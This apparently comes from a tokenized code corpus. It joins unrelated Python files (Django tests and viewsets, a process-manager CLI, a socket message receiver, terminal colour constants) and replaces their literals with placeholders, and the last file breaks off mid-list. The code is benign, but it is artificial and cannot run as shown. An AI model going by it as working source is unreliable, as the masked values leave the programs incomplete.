thinkplot . PrePlot ( <NUM_LIT:2> ) <EOL> xs , ys = thinkstats2 . NormalProbability ( weights ) <EOL> thinkplot . Plot ( xs , ys , label = '<STR_LIT>' ) <EOL> xs , ys = thinkstats2 . NormalProbability ( term_weights ) <EOL> thinkplot . Plot ( xs , ys , label = '<STR_LIT>' ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def main ( ) : <EOL> thinkstats2 . RandomSeed ( <NUM_LIT> ) <EOL> MakeExampleNormalPlot ( ) <EOL> MakeExpoCdf ( ) <EOL> MakeBabyBoom ( ) <EOL> MakeParetoCdf ( ) <EOL> MakeParetoCdf2 ( ) <EOL> MakeNormalCdf ( ) <EOL> preg = nsfg . ReadFemPreg ( ) <EOL> full_term = preg [ preg . prglngth >= <NUM_LIT> ] <EOL> weights = preg . totalwgt_lb . dropna ( ) <EOL> term_weights = full_term . totalwgt_lb . dropna ( ) <EOL> MakeNormalModel ( weights ) <EOL> MakeNormalPlot ( weights , term_weights ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import urllib2 <EOL> from djangosanetesting . cases import DatabaseTestCase , DestructiveDatabaseTestCase , HttpTestCase <EOL> from djangosanetesting . utils import mock_settings , get_live_server_path <EOL> from testapp . models import ExampleModel <EOL> import django <EOL> class TestDatabaseRollbackCase ( DatabaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_inserting_two ( self ) : <EOL> self . assert_equals ( <NUM_LIT:0> , len ( ExampleModel . objects . all ( ) ) ) <EOL> ExampleModel . objects . create ( name = "<STR_LIT>" ) <EOL> ExampleModel . objects . create ( name = "<STR_LIT>" ) <EOL> self . assert_equals ( <NUM_LIT:2> , len ( ExampleModel . objects . all ( ) ) ) <EOL> def test_inserting_two_again ( self ) : <EOL> self . assert_equals ( <NUM_LIT:0> , len ( ExampleModel . objects . all ( ) ) ) <EOL> ExampleModel . objects . create ( name = "<STR_LIT>" ) <EOL> ExampleModel . objects . create ( name = "<STR_LIT>" ) <EOL> self . assert_equals ( <NUM_LIT:2> , len ( ExampleModel . objects . all ( ) ) ) <EOL> def test_client_available ( self ) : <EOL> res = self . client . get ( '<STR_LIT>' ) <EOL> self . assert_equals ( <NUM_LIT:200> , res . status_code ) <EOL> class TestProperClashing ( DatabaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_aaa_commit_object ( self ) : <EOL> ExampleModel . objects . create ( name = "<STR_LIT>" ) <EOL> self . transaction . commit ( ) <EOL> def test_bbb_object_present ( self ) : <EOL> self . assert_equals ( <NUM_LIT:1> , len ( ExampleModel . objects . all ( ) ) ) <EOL> def test_ccc_object_still_present ( self ) : <EOL> self . assert_equals ( <NUM_LIT:1> , len ( ExampleModel . objects . all ( ) ) ) <EOL> ExampleModel . objects . all ( ) [ <NUM_LIT:0> ] . delete ( ) <EOL> self . transaction . commit ( ) <EOL> class TestFixturesLoadedProperly ( HttpTestCase ) : <EOL> fixtures = [ "<STR_LIT>" ] <EOL> def test_model_loaded ( self ) : <EOL> self . assert_equals ( <NUM_LIT:2> , len ( ExampleModel . objects . all ( ) ) ) <EOL> def test_available_in_another_thread ( self ) : <EOL> self . assertEquals ( u'<STR_LIT>' , self . urlopen ( '<STR_LIT>' % get_live_server_path ( ) ) . read ( ) ) <EOL> class TestDjangoOneTwoMultipleDatabases ( DestructiveDatabaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestDjangoOneTwoMultipleDatabases , self ) . setUp ( ) <EOL> if django . VERSION [ <NUM_LIT:0> ] < <NUM_LIT:1> or ( django . VERSION [ <NUM_LIT:0> ] == <NUM_LIT:1> and django . VERSION [ <NUM_LIT:1> ] < <NUM_LIT:2> ) : <EOL> raise self . SkipTest ( "<STR_LIT>" ) <EOL> @ mock_settings ( "<STR_LIT>" , None ) <EOL> @ mock_settings ( "<STR_LIT>" , { <EOL> } ) <EOL> def test_multiple_databases_flushed ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from collections import OrderedDict <EOL> from django . utils . encoding import force_text <EOL> from rest_framework . fields import empty <EOL> from rest_framework . metadata import SimpleMetadata <EOL> from rest_framework . serializers import ListSerializer , ModelSerializer <EOL> from dynamic_rest . fields import DynamicRelationField <EOL> class DynamicMetadata ( SimpleMetadata ) : <EOL> """<STR_LIT>""" <EOL> def determine_actions ( self , request , view ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def determine_metadata ( self , request , view ) : <EOL> """<STR_LIT>""" <EOL> metadata = super ( <EOL> DynamicMetadata , <EOL> self ) . determine_metadata ( <EOL> request , <EOL> view ) <EOL> metadata [ '<STR_LIT>' ] = getattr ( view , '<STR_LIT>' , [ ] ) <EOL> if hasattr ( view , '<STR_LIT>' ) : <EOL> serializer = view . get_serializer ( dynamic = False ) <EOL> if hasattr ( serializer , '<STR_LIT>' ) : <EOL> metadata [ '<STR_LIT>' ] = serializer . get_name ( ) <EOL> if hasattr ( serializer , '<STR_LIT>' ) : <EOL> metadata [ '<STR_LIT>' ] = serializer . get_plural_name ( ) <EOL> metadata [ '<STR_LIT>' ] = self . get_serializer_info ( serializer ) <EOL> return metadata <EOL> def get_field_info ( self , field ) : <EOL> """<STR_LIT>""" <EOL> field_info = OrderedDict ( ) <EOL> for attr in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT:label>' ) : <EOL> field_info [ attr ] = getattr ( field , attr ) <EOL> if field_info [ '<STR_LIT:default>' ] is empty : <EOL> field_info [ '<STR_LIT:default>' ] = None <EOL> field_info [ '<STR_LIT>' ] = field . allow_null <EOL> if hasattr ( field , '<STR_LIT>' ) : <EOL> field_info [ '<STR_LIT>' ] = [ <EOL> { <EOL> '<STR_LIT:value>' : choice_value , <EOL> '<STR_LIT>' : force_text ( choice_name , strings_only = True ) <EOL> } <EOL> for choice_value , choice_name in field . choices . items ( ) <EOL> ] <EOL> many = False <EOL> if isinstance ( field , DynamicRelationField ) : <EOL> field = field . serializer <EOL> if isinstance ( field , ListSerializer ) : <EOL> field = field . child <EOL> many = True <EOL> if isinstance ( field , ModelSerializer ) : <EOL> type = '<STR_LIT>' if many else '<STR_LIT>' <EOL> field_info [ '<STR_LIT>' ] = field . get_plural_name ( ) <EOL> else : <EOL> type = self . label_lookup [ field ] <EOL> field_info [ '<STR_LIT:type>' ] = type <EOL> return field_info </s>
<s> from rest_framework import exceptions <EOL> from dynamic_rest . viewsets import DynamicModelViewSet <EOL> from tests . models import Cat , Dog , Group , Horse , Location , Profile , User , Zebra <EOL> from tests . serializers import ( <EOL> CatSerializer , <EOL> DogSerializer , <EOL> GroupSerializer , <EOL> HorseSerializer , <EOL> LocationSerializer , <EOL> ProfileSerializer , <EOL> UserLocationSerializer , <EOL> UserSerializer , <EOL> ZebraSerializer <EOL> ) <EOL> class UserViewSet ( DynamicModelViewSet ) : <EOL> features = ( <EOL> DynamicModelViewSet . INCLUDE , DynamicModelViewSet . EXCLUDE , <EOL> DynamicModelViewSet . FILTER , DynamicModelViewSet . SORT <EOL> ) <EOL> model = User <EOL> serializer_class = UserSerializer <EOL> queryset = User . objects . all ( ) <EOL> def get_queryset ( self ) : <EOL> location = self . request . query_params . get ( '<STR_LIT:location>' ) <EOL> qs = self . queryset <EOL> if location : <EOL> qs = qs . filter ( location = location ) <EOL> return qs <EOL> def list ( self , request , * args , ** kwargs ) : <EOL> query_params = self . request . query_params <EOL> if query_params . get ( '<STR_LIT:name>' ) : <EOL> query_params . add ( '<STR_LIT>' , query_params . get ( '<STR_LIT:name>' ) ) <EOL> return super ( UserViewSet , self ) . list ( request , * args , ** kwargs ) <EOL> class GroupNoMergeDictViewSet ( DynamicModelViewSet ) : <EOL> model = Group <EOL> serializer_class = GroupSerializer <EOL> queryset = Group . objects . all ( ) <EOL> def create ( self , request , * args , ** kwargs ) : <EOL> response = super ( GroupNoMergeDictViewSet , self ) . create ( <EOL> request , <EOL> * args , <EOL> ** kwargs <EOL> ) <EOL> if hasattr ( request , '<STR_LIT:data>' ) : <EOL> try : <EOL> from django . utils . datastructures import MergeDict <EOL> if isinstance ( request . data , MergeDict ) : <EOL> raise exceptions . ValidationError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> elif not isinstance ( request . data , dict ) : <EOL> raise exceptions . ValidationError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> except : <EOL> pass <EOL> return response <EOL> class GroupViewSet ( DynamicModelViewSet ) : <EOL> features = ( <EOL> DynamicModelViewSet . INCLUDE , DynamicModelViewSet . EXCLUDE , <EOL> DynamicModelViewSet . FILTER , DynamicModelViewSet . SORT <EOL> ) <EOL> model = Group <EOL> serializer_class = GroupSerializer <EOL> queryset = Group . objects . all ( ) <EOL> class LocationViewSet ( DynamicModelViewSet ) : <EOL> features = ( <EOL> DynamicModelViewSet . INCLUDE , DynamicModelViewSet . EXCLUDE , <EOL> DynamicModelViewSet . FILTER , DynamicModelViewSet . SORT <EOL> ) <EOL> model = Location <EOL> serializer_class = LocationSerializer <EOL> queryset = Location . objects . all ( ) <EOL> class UserLocationViewSet ( DynamicModelViewSet ) : <EOL> model = User <EOL> serializer_class = UserLocationSerializer <EOL> queryset = User . objects . all ( ) <EOL> class ProfileViewSet ( DynamicModelViewSet ) : <EOL> features = ( <EOL> DynamicModelViewSet . EXCLUDE , <EOL> DynamicModelViewSet . FILTER , <EOL> DynamicModelViewSet . INCLUDE , <EOL> DynamicModelViewSet . SORT <EOL> ) <EOL> model = Profile <EOL> serializer_class = ProfileSerializer <EOL> queryset = Profile . objects . all ( ) <EOL> class CatViewSet ( DynamicModelViewSet ) : <EOL> serializer_class = CatSerializer <EOL> queryset = Cat . objects . all ( ) <EOL> class DogViewSet ( DynamicModelViewSet ) : <EOL> model = Dog <EOL> serializer_class = DogSerializer <EOL> queryset = Dog . objects . all ( ) <EOL> class HorseViewSet ( DynamicModelViewSet ) : <EOL> features = ( DynamicModelViewSet . SORT , ) <EOL> model = Horse <EOL> serializer_class = HorseSerializer <EOL> queryset = Horse . objects . all ( ) <EOL> ordering_fields = ( '<STR_LIT:name>' , ) <EOL> ordering = ( '<STR_LIT>' , ) <EOL> class ZebraViewSet ( DynamicModelViewSet ) : <EOL> features = ( DynamicModelViewSet . SORT , ) <EOL> model = Zebra <EOL> serializer_class = ZebraSerializer <EOL> queryset = Zebra . objects . all ( ) <EOL> ordering_fields = '<STR_LIT>' </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import unicode_literals , print_function <EOL> from argparse import RawDescriptionHelpFormatter <EOL> import logging <EOL> import sys <EOL> from clyent import print_colors <EOL> from chalmers import errors <EOL> from chalmers . utils import cli <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> def main ( args ) : <EOL> programs = cli . select_programs ( args , filter_paused = False , force = args . force ) <EOL> programs = cli . filter_programs ( programs , lambda p : not p . is_running , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not programs : <EOL> return <EOL> for prog in programs : <EOL> if prog . is_running : <EOL> print ( "<STR_LIT>" % prog . name [ : <NUM_LIT> ] , end = '<STR_LIT>' ) ; sys . stdout . flush ( ) <EOL> try : <EOL> prog . stop ( args . force ) <EOL> except errors . StateError as err : <EOL> log . error ( err . message ) <EOL> except errors . ConnectionError as err : <EOL> print_colors ( "<STR_LIT>" % err . message ) <EOL> else : <EOL> print_colors ( "<STR_LIT>" ) <EOL> else : <EOL> print_colors ( "<STR_LIT>" % prog . name [ : <NUM_LIT> ] , "<STR_LIT>" ) <EOL> def pause_main ( args ) : <EOL> programs = cli . select_programs ( args , filter_paused = False ) <EOL> programs = cli . filter_programs ( programs , lambda p : p . is_paused , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not programs : <EOL> return <EOL> for prog in programs : <EOL> log . info ( "<STR_LIT>" % ( prog . name ) ) <EOL> if prog . is_running : <EOL> log . warn ( "<STR_LIT>" % ( prog . name ) ) <EOL> prog . state . update ( paused = True ) <EOL> def unpause_main ( args ) : <EOL> programs = cli . select_programs ( args , filter_paused = False ) <EOL> programs = cli . filter_programs ( programs , lambda p : not p . is_paused , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not programs : <EOL> return <EOL> for prog in programs : <EOL> log . info ( "<STR_LIT>" % ( prog . name ) ) <EOL> prog . state . update ( paused = False ) <EOL> if not prog . is_running : <EOL> log . warning ( "<STR_LIT>" % ( prog . name ) ) <EOL> def add_parser ( subparsers ) : <EOL> parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> description = __doc__ , <EOL> formatter_class = RawDescriptionHelpFormatter ) <EOL> cli . add_selection_group ( parser ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . set_defaults ( main = main ) <EOL> parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> description = __doc__ , <EOL> formatter_class = RawDescriptionHelpFormatter ) <EOL> cli . add_selection_group ( parser ) <EOL> parser . set_defaults ( main = pause_main ) <EOL> parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> description = __doc__ , <EOL> formatter_class = RawDescriptionHelpFormatter ) <EOL> cli . add_selection_group ( parser ) <EOL> parser . set_defaults ( main = unpause_main ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import io <EOL> import logging <EOL> import os <EOL> import shutil <EOL> import unittest <EOL> import mock <EOL> import yaml <EOL> from chalmers import config , errors <EOL> from chalmers . scripts import chalmers_main <EOL> class ChalmersCli ( object ) : <EOL> def __init__ ( self ) : <EOL> self . script = chalmers_main . __file__ <EOL> if self . script . endswith ( '<STR_LIT>' ) or self . script . endswith ( '<STR_LIT>' ) : <EOL> self . script = self . script [ : - <NUM_LIT:1> ] <EOL> self . env = os . environ . copy ( ) <EOL> self . root = '<STR_LIT>' <EOL> self . env [ '<STR_LIT>' ] = self . root <EOL> config . set_relative_dirs ( self . root ) <EOL> logging . getLogger ( '<STR_LIT>' ) . addHandler ( logging . NullHandler ( ) ) <EOL> def __getattr__ ( self , subcommand ) : <EOL> def run_subcommand ( * args ) : <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , subcommand ] <EOL> cmd . extend ( args ) <EOL> out = io . StringIO ( ) <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . setLevel ( logging . ERROR ) <EOL> del log . handlers [ : ] <EOL> with mock . patch ( '<STR_LIT>' , out ) , mock . patch ( '<STR_LIT>' ) : <EOL> chalmers_main . main ( cmd , False ) <EOL> return out . getvalue ( ) <EOL> return run_subcommand <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . cli = ChalmersCli ( ) <EOL> if os . path . isdir ( self . cli . root ) : <EOL> shutil . rmtree ( self . cli . root ) <EOL> unittest . TestCase . setUp ( self ) <EOL> def tearDown ( self ) : <EOL> if os . path . isdir ( self . cli . root ) : <EOL> shutil . rmtree ( self . cli . root ) <EOL> unittest . TestCase . tearDown ( self ) <EOL> def test_add_show ( self ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( self . cli . show ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . cli . show ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( ) , '<STR_LIT>' ) <EOL> def test_cant_add_twice ( self ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( errors . ChalmersError ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_remove ( self ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . cli . remove ( '<STR_LIT>' ) <EOL> def test_cant_remove_non_existent ( self ) : <EOL> with self . assertRaises ( SystemExit ) : <EOL> self . cli . remove ( '<STR_LIT>' ) <EOL> def test_cant_start_non_existent ( self ) : <EOL> with self . assertRaises ( SystemExit ) : <EOL> self . cli . start ( '<STR_LIT>' ) <EOL> def test_list_no_programs ( self ) : <EOL> out = self . cli . list ( ) <EOL> self . assertEqual ( out . strip ( ) , "<STR_LIT>" ) <EOL> def test_list ( self ) : <EOL> out = self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> out = self . cli . list ( ) <EOL> self . assertEqual ( out . split ( ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_pause ( self ) : <EOL> out = self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> out = self . cli . list ( ) <EOL> self . assertEqual ( out . split ( ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> out = self . cli . on ( '<STR_LIT>' ) <EOL> out = self . cli . list ( ) <EOL> self . assertEqual ( out . split ( ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> out = self . cli . off ( '<STR_LIT>' ) <EOL> out = self . cli . list ( ) <EOL> self . assertEqual ( out . split ( ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_show ( self ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> out = self . cli . show ( '<STR_LIT>' ) <EOL> def test_set ( self ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> out = self . cli . set ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( out . strip ( ) , "<STR_LIT>" ) <EOL> out = self . cli . show ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( out . strip ( ) ) as fd : <EOL> data = yaml . load ( fd ) <EOL> self . assertEqual ( data [ '<STR_LIT:x>' ] , <NUM_LIT:1> ) <EOL> def test_start ( self ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> out = self . cli . start ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_log ( self ) : <EOL> self . cli . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> out = self . cli . start ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> out = self . cli . log ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , out ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import sys <EOL> if sys . version_info . major < <NUM_LIT:3> : <EOL> print ( "<STR_LIT>" ) <EOL> exit ( ) <EOL> class Error ( Exception ) : <EOL> def __init__ ( self , message ) : <EOL> self . message = message <EOL> def __str__ ( self ) : <EOL> return repr ( self . message ) <EOL> class ErrorConfig ( Error ) : <EOL> pass <EOL> class ErrorQuery ( Error ) : <EOL> pass <EOL> class ErrorQueryTimeout ( Error ) : <EOL> pass <EOL> class ErrorProfile ( Error ) : <EOL> pass <EOL> class ErrorLogin ( Error ) : <EOL> pass <EOL> class ErrorVerification ( Error ) : <EOL> pass <EOL> class ErrorEDDN ( Error ) : <EOL> pass <EOL> class ErrorLog ( Error ) : <EOL> pass </s>
<s> from django import forms <EOL> from . models import Order , Item <EOL> class OrderForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Order <EOL> fields = [ '<STR_LIT:name>' ] <EOL> def save ( self , commit = True ) : <EOL> instance = super ( OrderForm , self ) . save ( commit = commit ) <EOL> if commit : <EOL> instance . action_on_save = True <EOL> instance . save ( ) <EOL> return instance <EOL> class ItemForm ( forms . ModelForm ) : <EOL> flag = forms . BooleanField ( initial = True ) <EOL> class Meta : <EOL> model = Item <EOL> fields = [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' ] <EOL> class AddressForm ( forms . Form ) : <EOL> name = forms . CharField ( max_length = <NUM_LIT:255> , required = True ) <EOL> line1 = forms . CharField ( max_length = <NUM_LIT:255> , required = False ) <EOL> line2 = forms . CharField ( max_length = <NUM_LIT:255> , required = False ) <EOL> city = forms . CharField ( max_length = <NUM_LIT:255> , required = False ) <EOL> postcode = forms . CharField ( max_length = <NUM_LIT:10> , required = True ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' ) <EOL> super ( AddressForm , self ) . __init__ ( * args , ** kwargs ) </s>
<s> from threading import * <EOL> import socket <EOL> from . . constants import * <EOL> from . threadutils import * <EOL> from . . config import * <EOL> from struct import pack , unpack <EOL> import hashlib <EOL> class ReceiverThread ( Thread ) : <EOL> def __init__ ( self , config ) : <EOL> Thread . __init__ ( self ) <EOL> self . config = config <EOL> def setup ( self , sock ) : <EOL> self . sock = sock <EOL> self . data = b'<STR_LIT>' <EOL> def run ( self ) : <EOL> while True : <EOL> if isShutdownReady ( ) : <EOL> safePrint ( "<STR_LIT>" ) <EOL> break <EOL> dataLength = len ( self . data ) <EOL> try : <EOL> safePrint ( "<STR_LIT>" ) <EOL> self . data += self . sock . recv ( <NUM_LIT> ) <EOL> except socket . timeout : <EOL> safePrint ( "<STR_LIT>" ) <EOL> break <EOL> except Exception as err : <EOL> break <EOL> if len ( self . data ) == dataLength : <EOL> safePrint ( "<STR_LIT>" ) <EOL> break <EOL> else : <EOL> self . processData ( ) <EOL> def processData ( self ) : <EOL> if len ( self . data ) < <NUM_LIT:20> : <EOL> return <EOL> if self . data [ <NUM_LIT:0> : <NUM_LIT:4> ] != MESSAGE_MAGIC_BYTES : <EOL> safePrint ( "<STR_LIT>" ) <EOL> self . data = '<STR_LIT>' <EOL> return <EOL> command = self . data [ <NUM_LIT:4> : <NUM_LIT:12> ] . decode ( ) . rstrip ( "<STR_LIT:\x00>" ) <EOL> payloadLength = unpack ( '<STR_LIT>' , self . data [ <NUM_LIT:12> : <NUM_LIT:16> ] ) [ <NUM_LIT:0> ] <EOL> safePrint ( "<STR_LIT>" , payloadLength , "<STR_LIT>" ) <EOL> payload = self . data [ <NUM_LIT:20> : <NUM_LIT:20> + payloadLength ] <EOL> safePrint ( "<STR_LIT>" , payload ) <EOL> checksum = hashlib . sha512 ( payload ) . digest ( ) [ <NUM_LIT:0> : <NUM_LIT:4> ] <EOL> safePrint ( "<STR_LIT>" , checksum ) <EOL> if self . data [ <NUM_LIT:16> : <NUM_LIT:20> ] != checksum : <EOL> safePrint ( "<STR_LIT>" ) <EOL> self . data = self . data [ <NUM_LIT:20> + payloadLength : ] <EOL> self . processData ( ) <EOL> return <EOL> if command == '<STR_LIT>' : <EOL> self . recVersion ( payload ) <EOL> elif command == '<STR_LIT>' : <EOL> self . recVerack ( ) <EOL> def recVersion ( self , payload ) : <EOL> payload = payload . decode ( ) <EOL> safePrint ( "<STR_LIT>" , payload ) <EOL> if ( payload == VERSION ) : <EOL> with responseMessagesLock : <EOL> responseMessages . append ( getCommandString ( '<STR_LIT>' , self . config ) ) <EOL> def recVerack ( self ) : <EOL> safePrint ( "<STR_LIT>" ) </s>
<s> import os <EOL> import sys <EOL> import termios <EOL> from urwid . util import int_scale <EOL> from urwid import signals <EOL> from urwid . compat import B , bytes3 <EOL> UNPRINTABLE_TRANS_TABLE = B ( "<STR_LIT:?>" ) * <NUM_LIT:32> + bytes3 ( range ( <NUM_LIT:32> , <NUM_LIT> ) ) <EOL> UPDATE_PALETTE_ENTRY = "<STR_LIT>" <EOL> INPUT_DESCRIPTORS_CHANGED = "<STR_LIT>" <EOL> _BASIC_START = <NUM_LIT:0> <EOL> _CUBE_START = <NUM_LIT:16> <EOL> _CUBE_SIZE_256 = <NUM_LIT:6> <EOL> _GRAY_SIZE_256 = <NUM_LIT> <EOL> _GRAY_START_256 = _CUBE_SIZE_256 ** <NUM_LIT:3> + _CUBE_START <EOL> _CUBE_WHITE_256 = _GRAY_START_256 - <NUM_LIT:1> <EOL> _CUBE_SIZE_88 = <NUM_LIT:4> <EOL> _GRAY_SIZE_88 = <NUM_LIT:8> <EOL> _GRAY_START_88 = _CUBE_SIZE_88 ** <NUM_LIT:3> + _CUBE_START <EOL> _CUBE_WHITE_88 = _GRAY_START_88 - <NUM_LIT:1> <EOL> _CUBE_BLACK = _CUBE_START <EOL> _CUBE_STEPS_256 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _GRAY_STEPS_256 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _CUBE_STEPS_88 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _GRAY_STEPS_88 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _BASIC_COLOR_VALUES = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) , ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) , ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:255> ) , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:255> ) , ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) ] <EOL> _COLOR_VALUES_256 = ( _BASIC_COLOR_VALUES + <EOL> [ ( r , g , b ) for r in _CUBE_STEPS_256 for g in _CUBE_STEPS_256 <EOL> for b in _CUBE_STEPS_256 ] + <EOL> [ ( gr , gr , gr ) for gr in _GRAY_STEPS_256 ] ) <EOL> _COLOR_VALUES_88 = ( _BASIC_COLOR_VALUES + <EOL> [ ( r , g , b ) for r in _CUBE_STEPS_88 for g in _CUBE_STEPS_88 <EOL> for b in _CUBE_STEPS_88 ] + <EOL> [ ( gr , gr , gr ) for gr in _GRAY_STEPS_88 ] ) <EOL> assert len ( _COLOR_VALUES_256 ) == <NUM_LIT> <EOL> assert len ( _COLOR_VALUES_88 ) == <NUM_LIT> <EOL> _FG_COLOR_MASK = <NUM_LIT> <EOL> _BG_COLOR_MASK = <NUM_LIT> <EOL> _FG_BASIC_COLOR = <NUM_LIT> <EOL> _FG_HIGH_COLOR = <NUM_LIT> <EOL> _BG_BASIC_COLOR = <NUM_LIT> <EOL> _BG_HIGH_COLOR = <NUM_LIT> <EOL> _BG_SHIFT = <NUM_LIT:8> <EOL> _HIGH_88_COLOR = <NUM_LIT> <EOL> _STANDOUT = <NUM_LIT> <EOL> _UNDERLINE = <NUM_LIT> <EOL> _BOLD = <NUM_LIT> <EOL> _BLINK = <NUM_LIT> <EOL> _FG_MASK = ( _FG_COLOR_MASK | _FG_BASIC_COLOR | _FG_HIGH_COLOR | <EOL> _STANDOUT | _UNDERLINE | _BLINK | _BOLD ) <EOL> _BG_MASK = _BG_COLOR_MASK | _BG_BASIC_COLOR | _BG_HIGH_COLOR <EOL> DEFAULT = '<STR_LIT:default>' <EOL> BLACK = '<STR_LIT>' <EOL> DARK_RED = '<STR_LIT>' <EOL> DARK_GREEN = '<STR_LIT>' <EOL> BROWN = '<STR_LIT>' <EOL> DARK_BLUE = '<STR_LIT>' <EOL> DARK_MAGENTA = '<STR_LIT>' <EOL> DARK_CYAN = '<STR_LIT>' <EOL> LIGHT_GRAY = '<STR_LIT>' <EOL> DARK_GRAY = '<STR_LIT>' <EOL> LIGHT_RED = '<STR_LIT>' <EOL> LIGHT_GREEN = '<STR_LIT>' <EOL> YELLOW = '<STR_LIT>' <EOL> LIGHT_BLUE = '<STR_LIT>' <EOL> LIGHT_MAGENTA = '<STR_LIT>' <EOL> LIGHT_CYAN = '<STR_LIT>' <EOL> WHITE = '<STR_LIT>' <EOL> _BASIC_COLORS = [ <EOL> BLACK , <EOL> DARK_RED , <EOL> DARK_GREEN , <EOL> BROWN , <EOL> DARK_BLUE , <EOL> DARK_MAGENTA , <EOL> DARK_CYAN , <EOL> LIGHT_GRAY , <EOL> DARK_GRAY , <EOL> LIGHT_RED , <EOL> 